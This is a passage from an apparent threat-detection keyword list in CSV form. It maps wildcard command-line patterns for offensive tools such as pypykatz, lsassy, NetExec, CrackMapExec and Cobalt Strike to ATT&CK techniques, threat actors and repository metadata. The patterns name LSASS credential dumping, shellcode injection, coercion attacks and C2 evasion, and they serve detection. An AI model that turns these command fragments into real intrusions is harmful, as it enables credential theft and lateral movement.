tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* LPORT=4444*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* lsa minidump * -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* lsa minidump *.dmp*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* lsa minidump *.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* lsa minidump /*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* lsass.dmp*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* lsass_creds.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* lsassy -k -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* lsassy*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -* lu-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -M dfscoerce *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M empire_exec -o LISTENER=http-listener*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M gpp_autologin*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M handlekatz *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M keepass_discover *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M keepass_discover*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M keepass_trigger -o ACTION=ALL USER=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -m lagentcmd *powershell *,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -* -M laps --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M ldap-checker *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M ldap-checker *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M lsassy *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M MAQ --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M masky *CA=*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M ms17-010 *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M mssql_priv *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M multirdp*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M nanodump *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -m olecmd -o *powershell *,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -* -M pe_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M petitpotam *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M petitpotam*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M printnightmare *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -m privileged-users --full *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M procdump ,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -m rdrleakdiag -M masterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -* -m run_command -c *.exe*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -M runasppl *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M scuffy -o SERVER=127.0.0.1*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M scuffy*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M shadowcoerce *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M shadowcoerce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M shellcode_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -m SimpleHTTPServer *,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -* -M slinky,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M slinky -o SERVER=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M spider_plus *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M spider_plus -o MAX_FILE_SIZE=100*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M teams_localdb *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -M tokens*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M uac,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -m venv csexec *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -M wdigest -o ACTION=disable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M wdigest -o ACTION=enable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -M web_delivery*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -M zerologon *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* m3-gen.py *,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -* malleable.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -* malleable-c2-randomizer*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* mask?a?a?a?a?*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --mask=?1?1?1* --min-len*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --max-attack-time*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -* maxdb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mcafee-epo-agent.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -mdns y -mdnsunicast n*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & 